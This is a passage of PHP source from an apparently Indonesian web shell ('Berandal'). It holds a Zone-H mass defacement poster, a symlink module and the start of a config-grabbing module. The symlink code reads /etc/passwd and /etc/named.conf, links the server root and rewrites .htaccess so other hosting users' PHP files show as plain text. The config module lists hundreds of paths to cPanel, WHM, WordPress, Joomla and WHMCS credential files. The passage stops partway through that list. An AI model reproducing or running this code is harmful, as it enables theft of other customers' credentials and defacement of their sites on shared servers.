  2034.             $zoneh = zoneh($url,$nick);
  2035.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2036.                 echo "$url -> <font color=lime>OK</font><br>";
  2037.             } else {
  2038.                 echo "$url -> <font color=red>ERROR</font><br>";
  2039.             }
  2040.         }
  2041.     } else {
  2042.         echo "<center class='mybox'><form method='post'>
  2043.         <h1>Zone-H Mass Poster</h1><hr color='white'><br>
  2044.         <u>Defacer</u>: <br>
  2045.         <input type='text' style='border-color=white' name='nick' size='50' value='Berandal'><br>
  2046.         <u>Domains</u>: <br>
  2047.         <textarea style='width: 450px; height: 150px; border-color=white' name='url'></textarea><br>
  2048.         <input type='submit' class='kotak' name='submit' value='Submit' style='width: 450px; border-color=white'>
  2049.         </form>";
  2050.     }
  2051.     echo "</center>";
  2052. }
  2053. elseif($_GET['666'] == 'symlink') {
  2054. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2055. $d0mains = @file("/etc/named.conf");
  2056. ##httaces
  2057. if($d0mains){
  2058. @mkdir("os_sym",0777);
  2059. @chdir("os_sym");
  2060. @exe("ln -s / root");
  2061. $file3 = 'Options Indexes FollowSymLinks
  2062. DirectoryIndex Berandal.htm
  2063. AddType text/plain .php
  2064. AddHandler text/plain .php
  2065. Satisfy Any';
  2066. $fp3 = fopen('.htaccess','w');
  2067. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2068. echo "
  2069. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2070. <tr>
  2071. <td align=center><font size=2>S. No.</font></td>
  2072. <td align=center><font size=2>Domains</font></td>
  2073. <td align=center><font size=2>Users</font></td>
  2074. <td align=center><font size=2>Symlink</font></td>
  2075. </tr>";
  2076. $dcount = 1;
  2077. foreach($d0mains as $d0main){
  2078. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2079. flush();
  2080. if(strlen(trim($domains[1][0])) > 2){
  2081. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2082. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2083. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2084. <td>".$user['name']."</td>
  2085. <td><a href='$full/os_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2086. flush();
  2087. $dcount++;}}}
  2088. echo "</table>";
  2089. }else{
  2090. $TEST=@file('/etc/passwd');
  2091. if ($TEST){
  2092. @mkdir("os_sym",0777);
  2093. @chdir("os_sym");
  2094. exe("ln -s / root");
  2095. $file3 = 'Options Indexes FollowSymLinks
  2096. DirectoryIndex Berandal.htm
  2097. AddType text/plain .php
  2098. AddHandler text/plain .php
  2099. Satisfy Any';
  2100.  $fp3 = fopen('.htaccess','w');
  2101.  $fw3 = fwrite($fp3,$file3);
  2102.  @fclose($fp3);
  2103.  echo "
  2104.  <table align=center border=1><tr>
  2105.  <td align=center><font size=3>S. No.</font></td>
  2106.  <td align=center><font size=3>Users</font></td>
  2107.  <td align=center><font size=3>Symlink</font></td></tr>";
  2108.  $dcount = 1;
  2109.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2110.  while(!feof($file)){
  2111.  $s = fgets($file);
  2112.  $matches = array();
  2113.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2114.  $matches = str_replace("home/","",$matches[1]);
  2115.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2116.  continue;
  2117.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2118.  <td align=center><font class=txt>" . $matches . "</td>";
  2119.  echo "<td align=center><font class=txt><a href=$full/os_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2120.  $dcount++;}fclose($file);
  2121.  echo "</table>";}else{if($os != "Windows"){@mkdir("os_sym",0777);@chdir("os_sym");@exe("ln -s / root");$file3 = '
  2122.  Options Indexes FollowSymLinks
  2123. DirectoryIndex berandal.htm
  2124. AddType text/plain .php
  2125. AddHandler text/plain .php
  2126. Satisfy Any
  2127. ';
  2128.  $fp3 = fopen('.htaccess','w');
  2129.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2130.  echo "
  2131.  <div class='mybox'><h1>Server Symlinker</h1><hr color='white'>
  2132.  <table align=center border=1><tr>
  2133.  <td align=center><font size=3>ID</font></td>
  2134.  <td align=center><font size=3>Users</font></td>
  2135.  <td align=center><font size=3>Symlink</font></td></tr>";
  2136.  $temp = "";$val1 = 0;$val2 = 1000;
  2137.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2138.  if ($uid)$temp .= join(':',$uid)."\n";}
  2139.  echo '<br/>';$temp = trim($temp);$file5 =
  2140.  fopen("test.txt","w");
  2141.  fputs($file5,$temp);
  2142.  fclose($file5);$dcount = 1;$file =
  2143.  fopen("test.txt", "r") or exit("Unable to open file!");
  2144.  while(!feof($file)){$s = fgets($file);$matches = array();
  2145.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2146.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2147.  continue;
  2148.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2149.  <td align=center><font class=txt>" . $matches . "</td>";
  2150.  echo "<td align=center><font class=txt><a href=$full/os_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2151.  $dcount++;}
  2152.  fclose($file);
  2153.  echo "</table></div></center>";unlink("test.txt");
  2154.  } else
  2155.  echo "<center><font size=3>Gabisa buat Symlink, Jancok!</font></center>";
  2156.  }
  2157.  }    
  2158. }
  2159.  
  2160. elseif($_GET['666'] == 'config') {
  2161.     if($_POST){
  2162.         $passwd = $_POST['passwd'];
  2163.         mkdir("os_config", 0777);
  2164.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2165.         $htc = fopen("os_config/.htaccess","w");
  2166.         fwrite($htc, $isi_htc);
  2167.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2168.         foreach($user_config[1] as $user_os) {
  2169.             $user_config_dir = "/home/$user_os/public_html/";
  2170.             if(is_readable($user_config_dir)) {
  2171.                 $grab_config = array(
  2172.                                         "/home/$user_os/.my.cnf" => "CPanel",
  2173.                     "/home/$user_os/.accesshash" => "WHM-accesshash",
  2174.                     "/home/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2175.                     "/home/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2176.                     "/home/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2177.                     "/home/$user_os/public_html/clientarea/configuration.php" => "WHMCS",            
  2178.                     "/home/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2179.                     "/home/$user_os/public_html/forum/config.php" => "phpBB",
  2180.                     "/home/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2181.                     "/home/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2182.                     "/home/$user_os/public_html/app/etc/local.xml" => "Magento",
  2183.                     "/home/$user_os/public_html/admin/config.php" => "OpenCart",
  2184.                     "/home/$user_os/public_html/slconfig.php" => "Sitelok",
  2185.                     "/home/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2186.                     "/home/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2187.                     "/home/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2188.                     "/home/$user_os/public_html/central/configuration.php" => "WHM Central",
  2189.                     "/home/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2190.                     "/home/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2191.                     "/home/$user_os/public_html/submitticket.php" => "WHMCS",                                    
  2192.                     "/home/$user_os/public_html/configuration.php" => "Joomla",                  
  2193.                     "/home/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2194.                     "/home/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2195.                     "/home/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
  2196.                     "/home/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2197.                     "/home/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2198.                     "/home/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2199.                     "/home/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2200.                     "/home/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2201.                     "/home/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2202.                     "/home/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2203.                     "/home/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2204.                     "/home/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2205.                     "/home/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2206.                     "/home/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2207.                     "/home/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2208.                     "/home/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2209.                     "/home/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2210.                     "/home/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2211.                     "/home/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2212.                     "/home/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2213.                     "/home/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2214.                     "/home/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2215.                     "/home/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2216.                     "/home/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2217.                     "/home/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2218.                     "/home/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2219.                     "/home/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2220.                     "/home/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2221.                     "/home/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2222.                     "/home/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2223.                     "/home/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2224.                     "/home/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2225.                     "/home/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2226.                     "/home/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2227.                     "/home/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2228.                     "/home/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                  
  2229.                     "/home/$user_os/public_html/wp-config.php" => "WordPress",
  2230.                     "/home/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2231.                     "/home/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2232.                     "/home/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2233.                     "/home/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2234.                     "/home/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2235.                     "/home/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2236.                     "/home/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2237.                     "/home/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2238.                     "/home/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2239.                     "/home/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2240.                     "/home/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2241.                     "/home/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2242.                     "/home/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2243.                     "/home/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2244.                     "/home/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2245.                     "/home/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2246.                     "/home/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2247.                     "/home/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2248.                     "/home/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2249.                     "/home/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2250.                     "/home/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2251.                     "/home/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2252.                     "/home/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2253.                     "/home/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2254.                     "/home/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2255.                     "/home/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2256.                     "/home/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2257.                     "/home/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2258.                     "/home/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2259.                     "/home/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2260.                     "/home/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2261.                     "/home/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2262.                     "/home/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2263.                     "/home/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2264.                     "/home/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2265.                     "/home/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal",
  2266.                                         "/home1/$user_os/.my.cnf" => "cpanel",
  2267.                     "/home1/$user_os/.accesshash" => "WHM-accesshash",
  2268.                     "/home1/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2269.                     "/home1/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2270.                     "/home1/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2271.                     "/home1/$user_os/public_html/clientarea/configuration.php" => "WHMCS",                
  2272.                     "/home1/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2273.                     "/home1/$user_os/public_html/forum/config.php" => "phpBB",
  2274.                     "/home1/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2275.                     "/home1/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2276.                     "/home1/$user_os/public_html/app/etc/local.xml" => "Magento",
  2277.                     "/home1/$user_os/public_html/admin/config.php" => "OpenCart",
  2278.                     "/home1/$user_os/public_html/slconfig.php" => "Sitelok",
  2279.                     "/home1/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2280.                     "/home1/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2281.                     "/home1/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2282.                     "/home1/$user_os/public_html/central/configuration.php" => "WHM Central",
  2283.                     "/home1/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2284.                     "/home1/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2285.                     "/home1/$user_os/public_html/submitticket.php" => "WHMCS",                                        
  2286.                     "/home1/$user_os/public_html/configuration.php" => "Joomla",                  
  2287.                     "/home1/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2288.                     "/home1/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2289.                     "/home1/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2290.                     "/home1/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2291.                     "/home1/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2292.                     "/home1/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2293.                     "/home1/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2294.                     "/home1/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2295.                     "/home1/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2296.                     "/home1/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2297.                     "/home1/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2298.                     "/home1/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2299.                     "/home1/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2300.                     "/home1/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2301.                     "/home1/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2302.                     "/home1/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2303.                     "/home1/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2304.                     "/home1/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2305.                     "/home1/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2306.                     "/home1/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2307.                     "/home1/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2308.                     "/home1/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2309.                     "/home1/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2310.                     "/home1/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2311.                     "/home1/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2312.                     "/home1/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2313.                     "/home1/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2314.                     "/home1/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2315.                     "/home1/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2316.                     "/home1/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2317.                     "/home1/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2318.                     "/home1/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2319.                     "/home1/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2320.                     "/home1/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2321.                     "/home1/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2322.                     "/home1/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2323.                     "/home1/$user_os/public_html/wp-config.php" => "WordPress",
  2324.                     "/home1/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2325.                     "/home1/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2326.                     "/home1/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",        
  2327.                     "/home1/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2328.                     "/home1/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2329.                     "/home1/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2330.                     "/home1/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2331.                     "/home1/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2332.                     "/home1/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2333.                     "/home1/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2334.                     "/home1/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2335.                     "/home1/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2336.                     "/home1/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2337.                     "/home1/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2338.                     "/home1/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2339.                     "/home1/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2340.                     "/home1/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2341.                     "/home1/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2342.                     "/home1/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2343.                     "/home1/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2344.                     "/home1/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2345.                     "/home1/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2346.                     "/home1/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2347.                     "/home1/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2348.                     "/home1/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2349.                     "/home1/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2350.                     "/home1/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2351.                     "/home1/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2352.                     "/home1/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2353.                     "/home1/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2354.                     "/home1/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2355.                     "/home1/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2356.                     "/home1/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2357.                     "/home1/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2358.                     "/home1/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2359.                     "/home1/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal",
  2360.                                         "/home2/$user_os/.my.cnf" => "cpanel",
  2361.                     "/home2/$user_os/.accesshash" => "WHM-accesshash",
  2362.                     "/home2/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2363.                     "/home2/$user_os/public_html/config/koneksi.php" => "Lokomedia",
  2364.                     "/home2/$user_os/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2365.                     "/home2/$user_os/public_html/clientarea/configuration.php" => "WHMCS",                
  2366.                     "/home2/$user_os/public_html/whmcs/configuration.php" => "WHMCS",
  2367.                     "/home2/$user_os/public_html/forum/config.php" => "phpBB",
  2368.                     "/home2/$user_os/public_html/sites/default/settings.php" => "Drupal",
  2369.                     "/home2/$user_os/public_html/config/settings.inc.php" => "PrestaShop",
  2370.                     "/home2/$user_os/public_html/app/etc/local.xml" => "Magento",
  2371.                     "/home2/$user_os/public_html/admin/config.php" => "OpenCart",
  2372.                     "/home2/$user_os/public_html/slconfig.php" => "Sitelok",
  2373.                     "/home2/$user_os/public_html/application/config/database.php" => "Ellislab",                  
  2374.                     "/home2/$user_os/public_html/whm/configuration.php" => "WHMCS",
  2375.                     "/home2/$user_os/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2376.                     "/home2/$user_os/public_html/central/configuration.php" => "WHM Central",
  2377.                     "/home2/$user_os/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2378.                     "/home2/$user_os/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2379.                     "/home2/$user_os/public_html/submitticket.php" => "WHMCS",                                        
  2380.                     "/home2/$user_os/public_html/configuration.php" => "Joomla",                  
  2381.                     "/home2/$user_os/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2382.                     "/home2/$user_os/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2383.                     "/home2/$user_os/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2384.                     "/home2/$user_os/public_html/Home/configuration.php" => "JoomlaHome",
  2385.                     "/home2/$user_os/public_html/HOME/configuration.php" => "JoomlaHome",
  2386.                     "/home2/$user_os/public_html/home/configuration.php" => "JoomlaHome",
  2387.                     "/home2/$user_os/public_html/NEW/configuration.php" => "JoomlaNew",
  2388.                     "/home2/$user_os/public_html/New/configuration.php" => "JoomlaNew",
  2389.                     "/home2/$user_os/public_html/new/configuration.php" => "JoomlaNew",
  2390.                     "/home2/$user_os/public_html/News/configuration.php" => "JoomlaNews",
  2391.                     "/home2/$user_os/public_html/NEWS/configuration.php" => "JoomlaNews",
  2392.                     "/home2/$user_os/public_html/news/configuration.php" => "JoomlaNews",
  2393.                     "/home2/$user_os/public_html/Cms/configuration.php" => "JoomlaCms",
  2394.                     "/home2/$user_os/public_html/CMS/configuration.php" => "JoomlaCms",
  2395.                     "/home2/$user_os/public_html/cms/configuration.php" => "JoomlaCms",
  2396.                     "/home2/$user_os/public_html/Main/configuration.php" => "JoomlaMain",
  2397.                     "/home2/$user_os/public_html/MAIN/configuration.php" => "JoomlaMain",
  2398.                     "/home2/$user_os/public_html/main/configuration.php" => "JoomlaMain",
  2399.                     "/home2/$user_os/public_html/Blog/configuration.php" => "JoomlaBlog",
  2400.                     "/home2/$user_os/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2401.                     "/home2/$user_os/public_html/blog/configuration.php" => "JoomlaBlog",
  2402.                     "/home2/$user_os/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2403.                     "/home2/$user_os/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2404.                     "/home2/$user_os/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2405.                     "/home2/$user_os/public_html/beta/configuration.php" => "JoomlaBeta",
  2406.                     "/home2/$user_os/public_html/Beta/configuration.php" => "JoomlaBeta",
  2407.                     "/home2/$user_os/public_html/BETA/configuration.php" => "JoomlaBeta",
  2408.                     "/home2/$user_os/public_html/PRESS/configuration.php" => "JoomlaPress",
  2409.                     "/home2/$user_os/public_html/Press/configuration.php" => "JoomlaPress",
  2410.                     "/home2/$user_os/public_html/press/configuration.php" => "JoomlaPress",
  2411.                     "/home2/$user_os/public_html/Wp/configuration.php" => "JoomlaWp",
  2412.                     "/home2/$user_os/public_html/wp/configuration.php" => "JoomlaWp",
  2413.                     "/home2/$user_os/public_html/WP/configuration.php" => "JoomlaWP",
  2414.                     "/home2/$user_os/public_html/portal/configuration.php" => "JoomlaPortal",
  2415.                     "/home2/$user_os/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2416.                     "/home2/$user_os/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2417.                     "/home2/$user_os/public_html/wp-config.php" => "WordPress",
  2418.                     "/home2/$user_os/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2419.                     "/home2/$user_os/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2420.                     "/home2/$user_os/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",        
  2421.                     "/home2/$user_os/public_html/Home/wp-config.php" => "WordPressHome",
  2422.                     "/home2/$user_os/public_html/HOME/wp-config.php" => "WordPressHome",
  2423.                     "/home2/$user_os/public_html/home/wp-config.php" => "WordPressHome",
  2424.                     "/home2/$user_os/public_html/NEW/wp-config.php" => "WordPressNew",
  2425.                     "/home2/$user_os/public_html/New/wp-config.php" => "WordPressNew",
  2426.                     "/home2/$user_os/public_html/new/wp-config.php" => "WordPressNew",
  2427.                     "/home2/$user_os/public_html/News/wp-config.php" => "WordPressNews",
  2428.                     "/home2/$user_os/public_html/NEWS/wp-config.php" => "WordPressNews",
  2429.                     "/home2/$user_os/public_html/news/wp-config.php" => "WordPressNews",
  2430.                     "/home2/$user_os/public_html/Cms/wp-config.php" => "WordPressCms",
  2431.                     "/home2/$user_os/public_html/CMS/wp-config.php" => "WordPressCms",
  2432.                     "/home2/$user_os/public_html/cms/wp-config.php" => "WordPressCms",
  2433.                     "/home2/$user_os/public_html/Main/wp-config.php" => "WordPressMain",
  2434.                     "/home2/$user_os/public_html/MAIN/wp-config.php" => "WordPressMain",
  2435.                     "/home2/$user_os/public_html/main/wp-config.php" => "WordPressMain",
  2436.                     "/home2/$user_os/public_html/Blog/wp-config.php" => "WordPressBlog",
  2437.                     "/home2/$user_os/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2438.                     "/home2/$user_os/public_html/blog/wp-config.php" => "WordPressBlog",
  2439.                     "/home2/$user_os/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2440.                     "/home2/$user_os/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2441.                     "/home2/$user_os/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2442.                     "/home2/$user_os/public_html/beta/wp-config.php" => "WordPressBeta",
  2443.                     "/home2/$user_os/public_html/Beta/wp-config.php" => "WordPressBeta",
  2444.                     "/home2/$user_os/public_html/BETA/wp-config.php" => "WordPressBeta",
  2445.                     "/home2/$user_os/public_html/PRESS/wp-config.php" => "WordPressPress",
  2446.                     "/home2/$user_os/public_html/Press/wp-config.php" => "WordPressPress",
  2447.                     "/home2/$user_os/public_html/press/wp-config.php" => "WordPressPress",
  2448.                     "/home2/$user_os/public_html/Wp/wp-config.php" => "WordPressWp",
  2449.                     "/home2/$user_os/public_html/wp/wp-config.php" => "WordPressWp",
  2450.                     "/home2/$user_os/public_html/WP/wp-config.php" => "WordPressWP",
  2451.                     "/home2/$user_os/public_html/portal/wp-config.php" => "WordPressPortal",
  2452.                     "/home2/$user_os/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2453.                     "/home2/$user_os/public_html/Portal/wp-config.php" => "WordPressPortal",
  2454.                     "/home3/$user_os/.my.cnf" => "cpanel",
  2455.                     "/home3/$user_os/.accesshash" => "WHM-accesshash",
  2456.                     "/home3/$user_os/public_html/bw-configs/config.ini" => "BosWeb",
  2457.                     "/home3/$user_os/public_html/config/koneksi.php" => "Lokomedia",
